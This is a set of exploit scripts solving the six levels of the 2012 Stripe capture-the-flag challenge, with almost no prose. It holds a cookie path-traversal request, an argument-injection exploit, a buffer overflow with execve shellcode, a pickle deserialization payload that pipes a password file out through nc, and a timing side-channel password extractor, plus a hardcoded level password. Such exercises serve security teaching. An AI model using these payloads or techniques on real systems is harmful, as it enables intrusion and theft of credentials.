Exploit code for the 2012 Stripe CTF Challenge https://stripe.com/blog/capture-the-flag

level01-date

#!/bin/sh

cat /home/level02/.password

level02-exploit.sh

#!/bin/sh

curl -u level02:kxlVXUvzv --digest -b "user_details=../../home/level03/.password
" http://ctf.stri.pe/level02.php 

level03-exploit.sh

#!/bin/sh

/levels/level03 -21 "cat /home/level04/.password $(printf "\x5b\x87\x04\x08")"

level04-exploit.sh

#!/bin/sh

/levels/level04 $(ruby -e 'print "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42" + "\x90"*987 + "\x7b\x85\x04\x08"')

level05-exploit.py

#!/usr/bin/python
# Thanks to Evan Broder <evan@ebroder.net>
import pickle
import subprocess
import urllib
import socket

class Gimme(object):
   def __reduce__(self):
       return (subprocess.Popen,
               (('/bin/sh', '-c',
                 'nc localhost 41803 </home/level06/.password'),))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 41803))
s.listen(1)
urllib.urlopen('http://localhost:9020', '; job: ' + pickle.dumps(Gimme()))
c, _ = s.accept()
print c.recv(1024)

level06-exploit.rb

#!/usr/bin/env ruby
# Thanks to Matt Page <mpage@cs.stanford.edu>
BANNER_LEN = "Welcome to the password checker!\n".size
PIPE_BUF_SIZE = 2 ** 16

def check_guess(level_path, pwfile_path, guess)
 child_stderr = IO.pipe
 child_stdout = IO.pipe

 #system('clear')
 puts guess

 child_stderr[1].write("A" * (PIPE_BUF_SIZE - BANNER_LEN - guess.size))

 pid = fork do
   # Hook up write ends
   $stdout.reopen(child_stdout[1])
   $stderr.reopen(child_stderr[1])

   # Close read ends
   [child_stderr, child_stdout].map {|ios| ios[0].close }

   exec("#{level_path} #{pwfile_path} #{guess}x")
   # NOTREACHED
   exit(0)
 end

 # Close our write ends
 [child_stderr, child_stdout].map {|ios| ios[1].close }

 # 100ms *should* be enough time for the forked child to write to stdout
 # when we're wrong
 guess_correct = IO.select([child_stdout[0]], nil, nil, 0.1) == nil

 Process.kill("KILL", pid)
 Process.waitpid(pid)

 guess_correct
ensure
 [child_stderr, child_stdout].flatten.each {|io| io.close unless io.closed? }
end

unless ARGV.size == 2
 puts "Usage: exploit06.rb [/path/to/level06] [/path/to/password_file]"
 exit 1
end

level_path, pwfile_path = ARGV

charset = ['a'..'z', 'A'..'Z', '0'..'9'].map {|x| x.to_a}.flatten
accum = ''
while nil == `#{level_path} #{pwfile_path} #{accum} 2>&1`.match('Wait')
 #system('clear')
 #puts "RETRIEVED THUS FAR: '#{accum}'"

 retrieved_char = nil
 charset.each do |guess|
   if check_guess(level_path, pwfile_path, accum + guess)
     retrieved_char = guess
     accum += guess
     break
   end
 end

 unless retrieved_char
   abort("FAILED TO RETRIEVE CHARACTER")
 end
end

puts "PASSWORD: #{accum}"